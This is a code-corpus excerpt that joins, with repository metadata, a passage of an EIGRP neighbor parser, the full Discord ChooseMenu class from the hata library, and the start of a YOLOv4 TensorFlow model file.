# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
result = r1.match(line)
if result:
group = result.groupdict()
name = group['name']
named_mode = True if name else False
address_family = group['address_family'].lower()
eigrp_instance = group['as_num']
vrf = group['vrf']
continue
# 1 10.23.90.3 Gi0/0/0/1.90 11 01:43:15 13 200 0 23
# 1 10.23.90.3 Gi0/0/0/1.390 14 01:41:47 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 13 02:54:01 816 4896 0 8
result = r2.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = int(group['peer_handle'])
ip_dict['hold'] = int(group['hold'])
ip_dict['uptime'] = group['uptime']
ip_dict['srtt'] = float(group['srtt'])/1000
ip_dict['rto'] = int(group['rto'])
ip_dict['q_cnt'] = int(group['q_cnt'])
ip_dict['last_seq_number'] = int(group['last_seq_number'])
continue
# 1 Link Local Address: Gi0/0/0/1.390 11 01:42:44 9 200 0 14
# 0 Link Local Address: Gi0/0/0/0.390 12 02:31:47 4 200 0 9
result = r3.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
peer_handle = int(group['peer_handle'])
hold = int(group['hold'])
uptime = group['uptime']
srtt = float(group['srtt'])/1000
rto = int(group['rto'])
q_cnt = int(group['q_cnt'])
last_seq_number = int(group['last_seq_number'])
continue
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
result = r4.match(line)
if result:
group = result.groupdict()
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = peer_handle
ip_dict['hold'] = hold
ip_dict['uptime'] = uptime
ip_dict['srtt'] = srtt
ip_dict['rto'] = rto
ip_dict['q_cnt'] = q_cnt
ip_dict['last_seq_number'] = last_seq_number
continue
# Version 23.0/2.0, Retrans: 1, Retries: 0, Prefixes: 6
# Version 8.0/1.2, Retrans: 1, Retries: 0, Prefixes: 5
result = r5.match(line)
if result:
group = result.groupdict()
sw_ver_dict = ip_dict.setdefault('nbr_sw_ver', {})
# Version begin
sw_ver_dict['os_majorver'] = int(group['os_majorver'])
sw_ver_dict['os_minorver'] = int(group['os_minorver'])
sw_ver_dict['tlv_majorrev'] = int(group['tlv_majorrev'])
sw_ver_dict['tlv_minorrev'] = int(group['tlv_minorrev'])
# Version end
ip_dict['retransmit_count'] = \
int(group['retransmit_count'])
ip_dict['retry_count'] = int(group['retry_count'])
prefixes = group['prefixes']
ip_dict['prefixes'] = int(prefixes) if prefixes else 0
continue
# BFD disabled
result = r6.match(line)
if result:
group = result.groupdict()
ip_dict['bfd'] = group['bfd']
return parsed_dict
class ShowEigrpIpv4NeighborsDetail(ShowEigrpNeighborsDetailSuperParser,
ShowEigrpNeighborsDetailSchema):
cli_command = ['show eigrp ipv4 vrf {vrf} neighbors detail',
'show eigrp ipv4 neighbors detail', ]
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
class ShowEigrpIpv6NeighborsDetail(ShowEigrpNeighborsDetailSuperParser,
ShowEigrpNeighborsDetailSchema):
cli_command = ['show eigrp ipv6 vrf {vrf} neighbors detail',
'show eigrp ipv6 neighbors detail', ]
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
| 39.663248
| 90
| 0.423566
|
e28c67d5442a0603d8391b7e36b29ecea7ae1986
| 31,490
|
py
|
Python
|
hata/ext/command_utils/choose_menu.py
|
asleep-cult/hata
|
d6175edf12b1775098b8b0912f98a1fef2e31760
|
[
"0BSD"
] | null | null | null |
hata/ext/command_utils/choose_menu.py
|
asleep-cult/hata
|
d6175edf12b1775098b8b0912f98a1fef2e31760
|
[
"0BSD"
] | null | null | null |
hata/ext/command_utils/choose_menu.py
|
asleep-cult/hata
|
d6175edf12b1775098b8b0912f98a1fef2e31760
|
[
"0BSD"
] | 1
|
2021-04-13T00:53:48.000Z
|
2021-04-13T00:53:48.000Z
|
# -*- coding: utf-8 -*-
__all__ = ('ChooseMenu', )
from ...backend.futures import Task
from ...discord.client_core import KOKORO
from ...discord.emoji import BUILTIN_EMOJIS
from ...discord.parsers import InteractionEvent
from ...discord.message import Message
from ...discord.channel import ChannelTextBase
from ...discord.exceptions import DiscordException, ERROR_CODES
from ...discord.embed import Embed
from .utils import GUI_STATE_READY, GUI_STATE_SWITCHING_PAGE, GUI_STATE_CANCELLING, GUI_STATE_CANCELLED, \
GUI_STATE_SWITCHING_CTX, Timeouter
class ChooseMenu:
"""
Familiar to ``Pagination``, but instead of just displaying multiple pages of text, it allows the user to select
a displayed option.
The class allows modifications and closing it's representations for every user. Also works at private channels.
Picks up on reaction additions and on reaction deletions as well and removes the added reactions on if has
permission, which might be missing, like in DM-s.
Attributes
----------
canceller : `None` or `function`
The function called when the ``ChooseMenu`` is cancelled or when it expires. This is a onetime use and after
it was used, is set as `None`.
channel : ``ChannelTextBase`` instance
The channel where the ``ChooseMenu`` is executed.
check : `None` or `callable`
A callable what decides whether the ``ChooseMenu`` should process a received reaction event. Defaults to
`None`.
Should accept the following parameters:
+-----------+---------------------------------------------------+
| Name | Type |
+===========+===================================================+
| event | ``ReactionAddEvent`` or ``ReactionDeleteEvent`` |
+-----------+---------------------------------------------------+
Note, that ``ReactionDeleteEvent`` is only given, when the client has no `manage_messages` permission.
Should return the following values:
+-------------------+-----------+
| Name | Type |
+===================+===========+
| should_process | `bool` |
+-------------------+-----------+
client : ``Client``
The client who executes the ``ChooseMenu``.
embed : ``EmbedBase`` instance
An embed base, what's description and footer will be rendered with the given choices and with information
about the respective page.
message : `None` or ``Message``
The message on what the ``ChooseMenu`` is executed.
selected : `int`
The currently selected option of the ``ChooseMenu``.
choices : `indexable` of `Any`
An indexable container, what stores the displayable choices.
It's elements's type can be different from each other, and different structures act differently as well.
There are the following cases:
- If an element is `str` instance, then it will be used as an option's title and when selecting it, only that
variable will be passed to the respective function when selected.
- If an element is neither `str` or `tuple`, then it's `repr` will be used as an option's title, and only that
variable will be passed to the respective function when selected.
- If an element is `tuple` instance, then it's first element will be displayed as title. If it is `str`, then
will be just simply added, however if not, then it's `repr` will be used. If selecting a `tuple` option,
then it's element will be passed to the respective function.
task_flag : `int`
A flag to store the state of the ``ChooseMenu``.
Possible values:
+---------------------------+-------+-----------------------------------------------------------------------+
| Respective name | Value | Description |
+===========================+=======+=======================================================================+
| GUI_STATE_READY | 0 | The ChooseMenu does nothing, is ready to be used. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_SWITCHING_PAGE | 1 | The ChooseMenu is currently changing it's page. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_CANCELLING | 2 | The ChooseMenu is currently changing it's page, but it was cancelled |
| | | meanwhile. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_CANCELLED | 3 | The ChooseMenu is, or is being cancelled right now. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_SWITCHING_CTX | 4 | The ChooseMenu is switching context. Not used by the default class, |
| | | but expected. |
+---------------------------+-------+-----------------------------------------------------------------------+
timeout : `float`
The timeout of the ``ChooseMenu`` in seconds.
timeouter : `None` or ``Timeouter``
Executes the timing out feature on the ``ChooseMenu``.
prefix : `None` or `str`
A prefix displayed before each option.
selector : `async-callable`
An `async-callable`, what is ensured when an option is selected.
If the ``ChooseMenu`` is created only with `1` option, then it is ensured initially instead of creating the
``ChooseMenu`` itself. At this case, if `message` was not given (or given as `None`), then the `message`
passed to the `selector` will be `None` as well.
At least 3 parameters are passed to the `selector`:
+-------------------+-------------------------------+
| Respective name | Type |
+===================+===============================+
| client | ``Client`` |
+-------------------+-------------------------------+
| channel | ``ChannelTextBase`` instance |
+-------------------+-------------------------------+
| message | ``Message`` or `None` |
+-------------------+-------------------------------+
The rest of the parameters depend on the respective choice (an elements of ``choices``). If the element is a
`tuple` instance, then it's element will be passed, however if the choice is any other type, then only that
object will be passed.
Class Attributes
----------------
UP : ``Emoji`` = `BUILTIN_EMOJIS['arrow_up_small']`
The emoji used to move on the displayed option one above.
DOWN : ``Emoji`` = `BUILTIN_EMOJIS['arrow_down_small']`
The emoji used to move on the displayed option one under.
LEFT : ``Emoji`` = `BUILTIN_EMOJIS['arrow_backward']`
The emoji used to move on the previous page.
RIGHT : ``Emoji`` = `BUILTIN_EMOJIS['arrow_forward']`
The emoji used to move on the next page.
SELECT : ``Emoji`` = `BUILTIN_EMOJIS['ok']`
The emoji used to select an option.
CANCEL : ``Emoji`` = `BUILTIN_EMOJIS['x']`
The emoji used to cancel the ``ChooseMenu``.
EMOJIS_RESTRICTED : `tuple` (`Emoji`, `Emoji`, `Emoji`, `Emoji`) = `(UP, DOWN, SELECT, CANCEL)`
Restricted emojis, added when the choose menu has only options for 1 page.
EMOJIS : `tuple` (`Emoji`, `Emoji`, `Emoji`, `Emoji`, `Emoji`, `Emoji`) = `(UP, DOWN, LEFT, RIGHT, SELECT, CANCEL)`
Emojis added to the choose menu.
"""
UP = BUILTIN_EMOJIS['arrow_up_small']
DOWN = BUILTIN_EMOJIS['arrow_down_small']
LEFT = BUILTIN_EMOJIS['arrow_backward']
RIGHT = BUILTIN_EMOJIS['arrow_forward']
SELECT = BUILTIN_EMOJIS['ok']
CANCEL = BUILTIN_EMOJIS['x']
EMOJIS_RESTRICTED = (UP, DOWN, SELECT, CANCEL)
EMOJIS = (UP, DOWN, LEFT, RIGHT, SELECT, CANCEL)
__slots__ = ('canceller', 'channel', 'check', 'client', 'embed', 'message', 'selected', 'choices', 'task_flag',
'timeout', 'timeouter', 'prefix', 'selector')
async def __new__(cls, client, channel, choices, selector, embed=Embed(), timeout=240., message=None, prefix=None,
check=None):
"""
Creates a new choose menu with the given parameters.
This method is a coroutine.
Parameters
----------
client : ``Client``
The client who executes the ``ChooseMenu``.
channel : ``ChannelTextBase`` instance or ``Message``
The channel where the ``ChooseMenu`` is executed. Pass it as a ``Message`` instance to send a reply.
If given as ``InteractionEvent``, then will acknowledge it and create a new message with it as well.
Although will not acknowledge it if `message` is given.
choices : `indexable` of `Any`
An indexable container, what stores the displayable choices.
It's elements's type can be different from each other, and different structures act differently as well.
There are the following cases:
- If an element is `str` instance, then it will be used as an option's title and when selecting it, only
that variable will be passed to the respective function when selected.
- If an element is neither `str` or `tuple`, then it's `repr` will be used as an option's title, and only
that variable will be passed to the respective function when selected.
- If an element is `tuple` instance, then it's first element will be displayed as title. If it is `str`,
then will be just simply added, however if not, then it's `repr` will be used. If selecting a `tuple`
option, then it's element will be passed to the respective function.
selector : `async-callable`
An `async-callable`, what is ensured when an option is selected.
If the ``ChooseMenu`` is created only with `1` option, then it is ensured initially instead of creating
the ``ChooseMenu`` itself. At this case, if `message` was not given (or given as `None`), then the
`message` passed to the `selector` will be `None` as well.
At least 3 parameters are passed to the `selector`:
+-------------------+-----------------------------------------------------------+
| Respective name | Type |
+===================+===========================================================+
| client | ``Client`` |
+-------------------+-----------------------------------------------------------+
| channel | ``ChannelTextBase``, ``Message`` or ``InteractionEvent`` |
+-------------------+-----------------------------------------------------------+
| message | ``Message`` or `None` |
+-------------------+-----------------------------------------------------------+
The rest of the parameters depend on the respective choice (an elements of ``choices``). If the element is a
`tuple` instance, then it's element will be passed, however if the choice is any other type, then only that
object will be passed.
embed : ``Embed`` (or any compatible)
An embed base, what's description and footer will be rendered with the given choices and with information
about the respective page. Defaults to an empty ``Embed`` instance.
timeout : `float`, Optional
The timeout of the ``ChooseMenu`` in seconds. Defaults to `240.0`.
message : `None` or ``Message``, Optional
The message on what the ``ChooseMenu`` will be executed. If not given a new message will be created.
Defaults to `None`.
prefix : `None` or `str`, Optional
A prefix displayed before each option. Defaults to `None`.
check : `None` or `callable`, Optional
A callable what decides whether the ``ChooseMenu`` should process a received reaction event. Defaults to
`None`.
Should accept the following parameters:
+-----------+---------------------------------------------------+
| Name | Type |
+===========+===================================================+
| event | ``ReactionAddEvent`` or ``ReactionDeleteEvent`` |
+-----------+---------------------------------------------------+
Note, that ``ReactionDeleteEvent`` is only given, when the client has no `manage_messages` permission.
Should return the following values:
+-------------------+-----------+
| Name | Type |
+===================+===========+
| should_process | `bool` |
+-------------------+-----------+
Returns
-------
self : `None` or ``ChooseMenu``
If `choices`'s length is less than `2`, then returns `None`.
Raises
------
TypeError
`channel`'s type is incorrect.
ValueError
If `prefix` was not given as `None` and it's length is over `64` characters.
"""
if (prefix is not None) and (len(prefix) > 100):
raise ValueError(f'Please pass a prefix, what is shorter than 100 characters, got {prefix!r}.')
if isinstance(channel, ChannelTextBase):
target_channel = channel
received_interaction = False
elif isinstance(channel, Message):
target_channel = channel.channel
received_interaction = False
elif isinstance(channel, InteractionEvent):
target_channel = channel.channel
received_interaction = True
else:
raise TypeError(f'`channel` can be given only as `{ChannelTextBase.__name__}`, `{Message.__name__}` '
f'of as {InteractionEvent.__name__} instance, got {channel.__class__.__name__}.')
result_ln = len(choices)
if result_ln < 2:
if result_ln == 1:
choice = choices[0]
if isinstance(choice, tuple):
coro = selector(client, channel, message, *choice)
else:
coro = selector(client, channel, message, choice)
await coro
return None
self = object.__new__(cls)
self.check = check
self.client = client
self.channel = target_channel
self.choices = choices
self.selector = selector
self.selected = 0
self.canceller = cls._canceller
self.task_flag = GUI_STATE_READY
self.message = message
self.timeout = timeout
self.timeouter = None
self.prefix = prefix
self.embed = embed
try:
if message is None:
if received_interaction:
if not channel.is_acknowledged():
await client.interaction_response_message_create(channel)
message = await client.interaction_followup_message_create(channel, embed=self._render_embed())
else:
message = await client.message_create(channel, embed=self._render_embed())
self.message = message
else:
await client.message_edit(message, embed=self._render_embed())
if not target_channel.cached_permissions_for(client).can_add_reactions:
return self
for emoji in (self.EMOJIS if (len(choices) > 10) else self.EMOJIS_RESTRICTED):
await client.reaction_add(message, emoji)
except BaseException as err:
if isinstance(err, ConnectionError):
return self
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.max_reactions, # reached reaction 20, some1 is trolling us.
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
ERROR_CODES.cannot_message_user, # user has dm-s disallowed
):
return self
raise
self.timeouter = Timeouter(self, timeout=timeout)
client.events.reaction_add.append(message, self)
client.events.reaction_delete.append(message, self)
return self
def _render_embed(self):
"""
Renders the choose menu's embed's description with it's choices of the respective page and it's footer
with page information.
Returns
-------
embed : ``Embed`` (or any compatible)
The rendered embed.
"""
selected = self.selected
choices = self.choices
index = (selected//10)*10
end = index+10
if len(choices) < end:
end = len(choices)
parts = []
prefix = self.prefix
left_length = 195
if (prefix is not None):
left_length -= len(prefix)
while True:
title = choices[index]
if isinstance(title,tuple):
if not title:
title = ''
else:
title = title[0]
if not isinstance(title,str):
title = str(title)
if len(title) > left_length:
space_position = title.rfind(' ', left_length-25, left_length)
if space_position == -1:
space_position = left_length-3
title = title[:space_position]+'...'
if index == selected:
if (prefix is not None):
parts.append('**')
parts.append(prefix)
parts.append('** ')
parts.append('**')
parts.append(title)
parts.append('**\n')
else:
if (prefix is not None):
parts.append(prefix)
parts.append(' ')
parts.append(title)
parts.append('\n')
index +=1
if index == end:
break
embed = self.embed
embed.description = ''.join(parts)
current_page = (selected//10)+1
limit = len(choices)
page_limit = (limit//10)+1
start = end-9
if start < 1:
start = 1
if end == len(choices):
end -= 1
limit -= 1
embed.add_footer(f'Page {current_page}/{page_limit}, {start} - {end} / {limit}, selected: {selected+1}')
return embed
async def __call__(self, client, event):
"""
Called when a reaction is added or removed from the respective message.
This method is a coroutine.
Parameters
----------
client : ``Client``
The client who executes the ``ChooseMenu``
event : ``ReactionAddEvent``, ``ReactionDeleteEvent``
The received event.
"""
if event.user.is_bot:
return
if (event.emoji not in (self.EMOJIS if len(self.choices)>10 else self.EMOJIS_RESTRICTED)):
return
client = self.client
if (event.delete_reaction_with(client) == event.DELETE_REACTION_NOT_ADDED):
return
check = self.check
if (check is not None):
try:
should_continue = check(event)
except BaseException as err:
await client.events.error(client, f'{self!r}.__call__', err)
return
if not should_continue:
return
task_flag = self.task_flag
if task_flag != GUI_STATE_READY:
if task_flag == GUI_STATE_SWITCHING_PAGE:
if event.emoji is self.CANCEL:
self.task_flag = GUI_STATE_CANCELLING
return
# ignore GUI_STATE_CANCELLED and GUI_STATE_SWITCHING_CTX
return
message = self.message
while True:
emoji = event.emoji
if emoji is self.UP:
selected = self.selected-1
break
if emoji is self.DOWN:
selected = self.selected+1
break
if emoji is self.LEFT:
selected = self.selected-10
break
if emoji is self.RIGHT:
selected = self.selected+10
break
if emoji is self.CANCEL:
self.task_flag = GUI_STATE_CANCELLED
try:
await client.message_delete(message)
except BaseException as err:
self.cancel()
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.invalid_access, # client removed
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
else:
self.cancel()
return
if emoji is self.SELECT:
self.task_flag = GUI_STATE_SWITCHING_CTX
self.cancel()
try:
if self.channel.cached_permissions_for(client).can_manage_messages:
await client.reaction_clear(message)
else:
for emoji in self.EMOJIS:
await client.reaction_delete_own(message, emoji)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message already deleted
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
selector = self.selector
try:
choice = self.choices[self.selected]
channel = self.channel
if isinstance(choice, tuple):
coro = selector(client, channel, message, *choice)
else:
coro = selector(client, channel, message, choice)
await coro
except BaseException as err:
await client.events.error(client, f'{self!r}.__call__ when calling {selector!r}', err)
return
return
if selected < 0:
selected = 0
elif selected >= len(self.choices):
selected = len(self.choices)-1
if self.selected == selected:
return
self.selected = selected
self.task_flag = GUI_STATE_SWITCHING_PAGE
try:
await client.message_edit(message, embed=self._render_embed())
except BaseException as err:
self.task_flag = GUI_STATE_CANCELLED
self.cancel()
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message already deleted
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.invalid_access, # client removed
):
return
# We definitely do not want to silence `ERROR_CODES.invalid_form_body`
await client.events.error(client, f'{self!r}.__call__', err)
return
if self.task_flag == GUI_STATE_CANCELLING:
self.task_flag = GUI_STATE_CANCELLED
try:
await client.message_delete(message)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.invalid_access, # client removed
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
self.cancel()
return
self.task_flag = GUI_STATE_READY
self.timeouter.set_timeout(self.timeout)
async def _canceller(self, exception,):
"""
Used when the ``ChooseMenu`` is cancelled.
First of all removes the choose menu from waitfors, so it will not wait for reaction events, then sets the
``.task_flag`` of the it to `GUI_STATE_CANCELLED`.
If `exception` is given as `TimeoutError`, then removes the ``ChooseMenu``'s reactions from the respective
message.
This method is a coroutine.
Parameters
----------
exception : `None` or ``BaseException`` instance
Exception to cancel the ``ChooseMenu`` with.
"""
client = self.client
message = self.message
client.events.reaction_add.remove(message, self)
client.events.reaction_delete.remove(message, self)
if self.task_flag == GUI_STATE_SWITCHING_CTX:
# the message is not our, we should not do anything with it.
return
self.task_flag = GUI_STATE_CANCELLED
if exception is None:
return
if isinstance(exception, TimeoutError):
if self.channel.cached_permissions_for(client).can_manage_messages:
try:
await client.reaction_clear(message)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
):
return
await client.events.error(client, f'{self!r}._canceller', err)
return
return
timeouter = self.timeouter
if (timeouter is not None):
timeouter.cancel()
# we do nothing
def cancel(self, exception=None):
"""
Cancels the choose menu, if it is not cancelled yet.
Parameters
----------
exception : `None` or ``BaseException`` instance, Optional
Exception to cancel the choose menu with. Defaults to `None`
"""
canceller = self.canceller
if canceller is None:
return
self.canceller = None
timeouter = self.timeouter
if timeouter is not None:
timeouter.cancel()
return Task(canceller(self, exception), KOKORO)
def __repr__(self):
"""Returns the choose menu's representation."""
result = [
'<', self.__class__.__name__,
' client=', repr(self.client),
', choices=', repr(len(self.choices)),
', selected=', repr(self.selected),
', channel=', repr(self.channel),
', selector=', repr(self.selector),
]
prefix = self.prefix
if (prefix is not None):
result.append(', prefix=')
result.append(repr(prefix))
result.append(', task_flag=')
task_flag = self.task_flag
result.append(repr(task_flag))
result.append(' (')
task_flag_name = (
'GUI_STATE_READY',
'GUI_STATE_SWITCHING_PAGE',
'GUI_STATE_CANCELLING',
'GUI_STATE_CANCELLED',
'GUI_STATE_SWITCHING_CTX',
)[task_flag]
result.append(task_flag_name)
result.append(')>')
return ''.join(result)
| 43.980447
| 120
| 0.489965
|
f8af8756e1df706660a4d4e5c0a7b1ef9ef1e2d7
| 25,765
|
py
|
Python
|
yolov3/yolov4.py
|
5TechG-IT/5tg_ml_realTimeHumanDetection
|
d1fa9ee8f9602d8f14eb348036f17191c7d36b01
|
[
"MIT"
] | null | null | null |
yolov3/yolov4.py
|
5TechG-IT/5tg_ml_realTimeHumanDetection
|
d1fa9ee8f9602d8f14eb348036f17191c7d36b01
|
[
"MIT"
] | null | null | null |
yolov3/yolov4.py
|
5TechG-IT/5tg_ml_realTimeHumanDetection
|
d1fa9ee8f9602d8f14eb348036f17191c7d36b01
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Conv2D, Input, LeakyReLU, ZeroPadding2D, BatchNormalization, MaxPool2D
from tensorflow.keras.regularizers import l2
from yolov3.configs import *
STRIDES = np.array(YOLO_STRIDES)
ANCHORS = (np.array(YOLO_ANCHORS).T/STRIDES).T
def read_class_names(class_file_name):
# loads class name from a file
names = {}
with open(class_file_name, 'r') as data:
for ID, name in enumerate(data):
names[ID] = name.strip('\n')
return names
class BatchNormalization(BatchNormalization):
# "Frozen state" and "inference mode" are two separate concepts.
# `layer.trainable = False` is to freeze the layer, so the layer will use
# stored moving `var` and `mean` in the "inference mode", and both `gama`
# and `beta` will not be updated !
def call(self, x, training=False):
if not training:
training = tf.constant(False)
training = tf.logical_and(training, self.trainable)
return super().call(x, training)
def convolutional(input_layer, filters_shape, downsample=False, activate=True, bn=True, activate_type='leaky'):
if downsample:
input_layer = ZeroPadding2D(((1, 0), (1, 0)))(input_layer)
padding = 'valid'
strides = 2
else:
strides = 1
padding = 'same'
conv = Conv2D(filters=filters_shape[-1], kernel_size = filters_shape[0], strides=strides,
padding=padding, use_bias=not bn, kernel_regularizer=l2(0.0005),
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
bias_initializer=tf.constant_initializer(0.))(input_layer)
if bn:
conv = BatchNormalization()(conv)
if activate == True:
if activate_type == "leaky":
conv = LeakyReLU(alpha=0.1)(conv)
elif activate_type == "mish":
conv = mish(conv)
return conv
def mish(x):
return x * tf.math.tanh(tf.math.softplus(x))
def residual_block(input_layer, input_channel, filter_num1, filter_num2, activate_type='leaky'):
short_cut = input_layer
conv = convolutional(input_layer, filters_shape=(1, 1, input_channel, filter_num1), activate_type=activate_type)
conv = convolutional(conv , filters_shape=(3, 3, filter_num1, filter_num2), activate_type=activate_type)
residual_output = short_cut + conv
return residual_output
def upsample(input_layer):
return tf.image.resize(input_layer, (input_layer.shape[1] * 2, input_layer.shape[2] * 2), method='nearest')
def route_group(input_layer, groups, group_id):
convs = tf.split(input_layer, num_or_size_splits=groups, axis=-1)
return convs[group_id]
def darknet53(input_data):
input_data = convolutional(input_data, (3, 3, 3, 32))
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True)
for i in range(1):
input_data = residual_block(input_data, 64, 32, 64)
input_data = convolutional(input_data, (3, 3, 64, 128), downsample=True)
for i in range(2):
input_data = residual_block(input_data, 128, 64, 128)
input_data = convolutional(input_data, (3, 3, 128, 256), downsample=True)
for i in range(8):
input_data = residual_block(input_data, 256, 128, 256)
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 256, 512), downsample=True)
for i in range(8):
input_data = residual_block(input_data, 512, 256, 512)
route_2 = input_data
input_data = convolutional(input_data, (3, 3, 512, 1024), downsample=True)
for i in range(4):
input_data = residual_block(input_data, 1024, 512, 1024)
return route_1, route_2, input_data
def cspdarknet53(input_data):
input_data = convolutional(input_data, (3, 3, 3, 32), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 64, 64), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
for i in range(1):
input_data = residual_block(input_data, 64, 32, 64, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 64), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 64, 128), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 128, 64), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 128, 64), activate_type="mish")
for i in range(2):
input_data = residual_block(input_data, 64, 64, 64, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 64, 64), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 128), activate_type="mish")
input_data = convolutional(input_data, (3, 3, 128, 256), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 256, 128), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 256, 128), activate_type="mish")
for i in range(8):
input_data = residual_block(input_data, 128, 128, 128, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 128, 128), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 256, 256), activate_type="mish")
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 256, 512), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 512, 256), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 512, 256), activate_type="mish")
for i in range(8):
input_data = residual_block(input_data, 256, 256, 256, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 256, 256), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 512, 512), activate_type="mish")
route_2 = input_data
input_data = convolutional(input_data, (3, 3, 512, 1024), downsample=True, activate_type="mish")
route = input_data
route = convolutional(route, (1, 1, 1024, 512), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 1024, 512), activate_type="mish")
for i in range(4):
input_data = residual_block(input_data, 512, 512, 512, activate_type="mish")
input_data = convolutional(input_data, (1, 1, 512, 512), activate_type="mish")
input_data = tf.concat([input_data, route], axis=-1)
input_data = convolutional(input_data, (1, 1, 1024, 1024), activate_type="mish")
input_data = convolutional(input_data, (1, 1, 1024, 512))
input_data = convolutional(input_data, (3, 3, 512, 1024))
input_data = convolutional(input_data, (1, 1, 1024, 512))
input_data = tf.concat([tf.nn.max_pool(input_data, ksize=13, padding='SAME', strides=1), tf.nn.max_pool(input_data, ksize=9, padding='SAME', strides=1)
, tf.nn.max_pool(input_data, ksize=5, padding='SAME', strides=1), input_data], axis=-1)
input_data = convolutional(input_data, (1, 1, 2048, 512))
input_data = convolutional(input_data, (3, 3, 512, 1024))
input_data = convolutional(input_data, (1, 1, 1024, 512))
return route_1, route_2, input_data
def darknet19_tiny(input_data):
input_data = convolutional(input_data, (3, 3, 3, 16))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 16, 32))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 32, 64))
input_data = MaxPool2D(2, 2, 'same')(input_data)
